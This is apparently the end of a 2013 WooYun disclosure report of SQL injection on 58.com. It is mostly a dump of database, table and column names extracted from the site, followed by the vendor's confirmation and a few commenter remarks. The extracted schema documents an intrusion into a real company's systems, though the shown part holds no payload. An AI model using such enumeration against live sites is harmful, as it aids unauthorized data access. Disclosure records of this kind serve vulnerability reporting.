priceAudit	t_2s_ipodprice_audit	state
priceAudit	t_2s_pbprice_audit	id
priceAudit	t_2s_pbprice_audit	brand_id
priceAudit	t_2s_pbprice_audit	model_id
priceAudit	t_2s_pbprice_audit	quality_id
priceAudit	t_2s_pbprice_audit	ipad_mem_id
priceAudit	t_2s_pbprice_audit	ipad_ver_id
priceAudit	t_2s_pbprice_audit	ipad_wf_id
priceAudit	t_2s_pbprice_audit	minprice
priceAudit	t_2s_pbprice_audit	maxprice
priceAudit	t_2s_pbprice_audit	price
priceAudit	t_2s_pbprice_audit	modify_date
priceAudit	t_2s_pbprice_audit	newPrice
priceAudit	t_2s_pbprice_audit	fraudminprice
priceAudit	t_2s_pbprice_audit	fraudmaxprice
priceAudit	t_2s_pbprice_audit	state
priceAudit	t_2s_sjprice_audit	id
priceAudit	t_2s_sjprice_audit	brand_id
priceAudit	t_2s_sjprice_audit	model_id
priceAudit	t_2s_sjprice_audit	quality_id
priceAudit	t_2s_sjprice_audit	iphone_mem_id
priceAudit	t_2s_sjprice_audit	iphone_ver_id
priceAudit	t_2s_sjprice_audit	minprice
priceAudit	t_2s_sjprice_audit	maxprice
priceAudit	t_2s_sjprice_audit	price
priceAudit	t_2s_sjprice_audit	modify_date
priceAudit	t_2s_sjprice_audit	newPrice
priceAudit	t_2s_sjprice_audit	fraudminprice
priceAudit	t_2s_sjprice_audit	fraudmaxprice
priceAudit	t_2s_sjprice_audit	state
priceAudit	t_2s_xjprice_audit	id
priceAudit	t_2s_xjprice_audit	brand_id
priceAudit	t_2s_xjprice_audit	model_id
priceAudit	t_2s_xjprice_audit	quality_id
priceAudit	t_2s_xjprice_audit	dfxj_id
priceAudit	t_2s_xjprice_audit	minprice
priceAudit	t_2s_xjprice_audit	maxprice
priceAudit	t_2s_xjprice_audit	price
priceAudit	t_2s_xjprice_audit	modify_date
priceAudit	t_2s_xjprice_audit	newPrice
priceAudit	t_2s_xjprice_audit	state
priceAudit	t_2s_yxjprice_audit	id
priceAudit	t_2s_yxjprice_audit	brand_id
priceAudit	t_2s_yxjprice_audit	model_id
priceAudit	t_2s_yxjprice_audit	quality_id
priceAudit	t_2s_yxjprice_audit	yxj_ver_id
priceAudit	t_2s_yxjprice_audit	minprice
priceAudit	t_2s_yxjprice_audit	maxprice
priceAudit	t_2s_yxjprice_audit	price
priceAudit	t_2s_yxjprice_audit	modify_date
priceAudit	t_2s_yxjprice_audit	newPrice
priceAudit	t_2s_yxjprice_audit	state
priceAudit	t_hangqing_audit	ID
priceAudit	t_hangqing_audit	FactoryID
priceAudit	t_hangqing_audit	BrandID
priceAudit	t_hangqing_audit	SeriesID
priceAudit	t_hangqing_audit	ModelID
priceAudit	t_hangqing_audit	MadeYear
priceAudit	t_hangqing_audit	MinPrice
priceAudit	t_hangqing_audit	MaxPrice
priceAudit	t_hangqing_audit	CreateYear
priceAudit	t_hangqing_audit	CreateMonth
priceAudit	t_hangqing_audit	CreateTime
priceAudit	t_hangqing_audit	LevelID
priceAudit	t_hangqing_audit	LocalID
priceAudit	t_hangqing_audit	NewMinPrice
priceAudit	t_hangqing_audit	NewMaxPrice
priceAudit	t_hangqing_audit	GuidePrice
priceAudit	t_hangqing_audit	Displacement
priceAudit	t_hangqing_audit	state
qiche	cyinfo	id
qiche	cyinfo	userId
qiche	cyinfo	onlinecount
qiche	cyinfo	newlinecount
qiche	cyinfo	updatelinecount
qiche	cyinfo	deletelinecount
qiche	cyinfo	unpassedcount
qiche	cyinfo	todaypv
qiche	cyinfo	time
qiche	promotionInfo	id
qiche	promotionInfo	userId
qiche	promotionInfo	infoId
qiche	promotionInfo	cityId
qiche	promotionInfo	createTime
qiche	promotionInfo	updateTime
qiche	promotionInfo	beginTime
qiche	promotionInfo	endTime
qiche	promotionInfo	time
qiche	promotionInfo	todayPV
qiche	promotionInfo	PV
qiche	promotionInfo	state
qiche	refreshInfo	id
qiche	refreshInfo	userId
qiche	refreshInfo	infoId
qiche	refreshInfo	cityId
qiche	refreshInfo	refreshType
qiche	refreshInfo	count
qiche	refreshInfo	time
qiche	user	id
qiche	user	userId
qiche	user	cityId
qiche	user	comName
qiche	user	cityName
qiche	user	buyProductId
qiche	user	beginTime
qiche	user	endTime
qiche	user	PV
qiche	user	state
quanwang	quanwangresult	content
quanwang	quanwangresult	score
quanwang	u_infoactivelog	LogID
quanwang	u_infoactivelog	InfoID
quanwang	u_infoactivelog	ActiveType
quanwang	u_infoactivelog	ActiveTime
quanwang	u_infoactivelog	Remark
quanwang	u_infoactivelog	AdminName
quanwang	u_infoactivelog	AdminID
quanwang	u_infoactivelog	SystemType
quanwang	u_infoactivelog	CateID
quanwang	u_infoactivelog	OpTime
quanwang	u_infoactivelog	UserID
siteStat	Busine_DispCate	busineID
siteStat	Busine_DispCate	busineName
siteStat	Busine_DispCate	state
siteStat	Busine_DispCate	rules
siteStat	Busine_DispCate	rulesType
siteStat	Busine_DispCate	pID
siteStat	Busine_DispCate	fullPaths
siteStat	Busine_DispCate	Depth
siteStat	Busine_DispCate_20120910	busineID
siteStat	Busine_DispCate_20120910	busineName
siteStat	Busine_DispCate_20120910	state
siteStat	Busine_DispCate_20120910	rules
siteStat	Busine_DispCate_20120910	rulesType
siteStat	Busine_DispCate_20120910	pID
siteStat	Busine_DispCate_20120910	fullPaths
siteStat	Busine_DispCate_20120910	Depth
siteStat	Dim_Cate_Grade	cateid
siteStat	Dim_Cate_Grade	catename
siteStat	Dim_Cate_Grade	pid
siteStat	Dim_Cate_Grade	pname
siteStat	Dim_Topcate	cate
siteStat	Dim_Topcate	catename
siteStat	Fact_Weight_Change	datadate
siteStat	Fact_Weight_Change	cate
siteStat	Fact_Weight_Change	change_type
siteStat	Fact_Weight_Change	source
siteStat	Fact_Weight_Change	info_count
siteStat	Fact_Weight_Change	info_count_distinct
siteStat	Fact_Weight_Change	user_count
siteStat	Fact_Weight_Change	user_count_distinct
siteStat	Search_In_Topcate	datadate
siteStat	Search_In_Topcate	cate
siteStat	Search_In_Topcate	search_num
siteStat	Search_In_Topcate	search_jump
siteStat	Search_In_Topcate	other_cate
siteStat	Search_In_Topcate	other_area
siteStat	Search_In_Topcate	see_detail
siteStat	Search_In_Topcate	see_detail_num
siteStat	etl_log	datadate
siteStat	etl_log	table_name
siteStat	etl_log	flag
siteStat	etl_log	etl_start_time
siteStat	etl_log	etl_end_date
siteStat	infoResults	ID
siteStat	infoResults	bCateID
siteStat	infoResults	sCateID
siteStat	infoResults	bCityID
siteStat	infoResults	allInfoCount
siteStat	infoResults	agentInfoCount
siteStat	infoResults	personInfoCount
siteStat	infoResults	agentNewInfoCount
siteStat	infoResults	personNewInfoCount
siteStat	infoResults	newInfoCount
siteStat	infoResults	agentRefreshInfoCount
siteStat	infoResults	personRefreshInfoCount
siteStat	infoResults	refreshInfoCount
siteStat	infoResults	agentUpdateInfoCount
siteStat	infoResults	personUpdateInfoCount
siteStat	infoResults	updateInfoCount
siteStat	infoResults	delInfoCount
siteStat	infoResults	crawlCount
siteStat	infoResults	agentCrawlCount
siteStat	infoResults	personCrawlCount
siteStat	infoResults	allUserCount
siteStat	infoResults	agentUserCount
siteStat	infoResults	personUserCount
siteStat	infoResults	addTimes
siteStat	infoResults	wapCount
siteStat	infoResults	manualCheckCount
siteStat	infoResults	automaticCheckCount
siteStat	infoResults	automaticNoCheckCount
siteStat	list_analytics	lis_cate
siteStat	list_analytics	lis_city
siteStat	list_analytics	lis_date
siteStat	list_analytics	lis_type
siteStat	list_analytics	lis_pv
siteStat	list_analytics	lis_visit_result
siteStat	list_analytics	lis_fruitless
siteStat	list_analytics	lis_less_result
siteStat	list_analytics	lis_exit
siteStat	list_analytics	lis_bounce
siteStat	list_analytics	lis_time_dwell
siteStat	m58_log_all_pv	Id
siteStat	m58_log_all_pv	DataDate
siteStat	m58_log_all_pv	ListPV
siteStat	m58_log_all_pv	ListErrorPV
siteStat	m58_log_all_pv	DetailPV
siteStat	m58_log_all_pv	DetailErrorPV
siteStat	m58_log_all_pv	SouPV
siteStat	m58_log_all_pv	SouErrorPV
siteStat	m58_log_all_pv	Uv
siteStat	recruit_Category	ID
siteStat	recruit_Category	PID
siteStat	recruit_Category	Name
siteStat	recruit_Category	PY
siteStat	recruit_Category	FullPath
siteStat	recruit_Category	SortID
siteStat	recruit_Category	Depth
siteStat	recruit_Category	IsOpen
siteStat	recruit_Category	Level
siteStat	recruit_Category	Type
siteStat	stat_Category	CateID
siteStat	stat_Category	CateName
siteStat	stat_Category	Depth
siteStat	stat_Category	DirName
siteStat	stat_Category	PID
siteStat	stat_Category	FullPath
siteStat	stat_C	FullDirName
siteStat	stat_Category	FullCateName
siteStat	stat_DispCategory	DispCategoryID
siteStat	stat_DispCategory	CateID
siteStat	stat_DispCategory	CateName
siteStat	stat_DispCategory	Depth
siteStat	stat_DispCategory	ListName
siteStat	stat_DispCategory	Order
siteStat	stat_DispCategory	PID
siteStat	stat_DispCategory	IsVisible
siteStat	stat_DispCategory	FullPath
siteStat	stat_DispCategory	FullListName
siteStat	stat_DispCategory	FullCateName
siteStat	stat_DispLocal	DispLocalID
siteStat	stat_DispLocal	LocalID
siteStat	stat_DispLocal	LocalName
siteStat	stat_DispLocal	ListName
siteStat	stat_DispLocal	PID
siteStat	stat_DispLocal	Depth
siteStat	stat_DispLocal	Order
siteStat	stat_DispLocal	Type
siteStat	stat_DispLocal	IsVisible
siteStat	stat_DispLocal	FullPath
siteStat	stat_DispLocal	FullLocalName
siteStat	stat_DispLocal	FullListName
siteStat	stat_Local	LocalID
siteStat	stat_Local	LocalName
siteStat	stat_Local	DirName
siteStat	stat_Local	PID
siteStat	stat_Local	Depth
siteStat	stat_Local	FullPath
siteStat	stat_Local	FullLocalName
siteStat	stat_Local	FullDirName
siteStat	yewu_Category	CateID
siteStat	yewu_Category	CateName
siteStat	yewu_Category	Depth
siteStat	yewu_Category	PID
siteStat	yewu_Category	FullPath
test	Busine_DispCate	busineID
test	Busine_DispCate	busineName
test	Busine_DispCate	state
test	Busine_DispCate	rules
test	Busine_DispCate	rulesType
test	Busine_DispCate	pID
test	Busine_DispCate	fullPaths
test	Busine_DispCate	Depth
zhanlve_analysis	im_sta_view	datadate
zhanlve_analysis	im_sta_view	target_desc
zhanlve_analysis	im_sta_view	target
zhanlve_analysis	im_sta_view	target_value

修复方案:

你们专业

版权声明:转载请注明来源 工作专用@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-04-16 14:35

厂商回复:

确认是SQL注入漏洞,多谢各位白帽子报告漏洞,欢迎继续报告58的漏洞。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-16 17:37 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    厂商挺赞的

  2. 2013-04-17 09:27 | 工作专用 ( 实习白帽子 | Rank:77 漏洞数:6 | 起什么名字好呢。)

    @xsser 初来乍到 ~!~ 楼下列队欢迎我吧!

  3. 2013-04-18 17:08 | lucky ( 普通白帽子 | Rank:409 漏洞数:81 | 三人行必有我师焉########################...)

    难道是8K兄

  4. 2013-05-17 16:35 | perhaps ( 实习白帽子 | Rank:70 漏洞数:4 )

    这表数据把我216内存给坑的。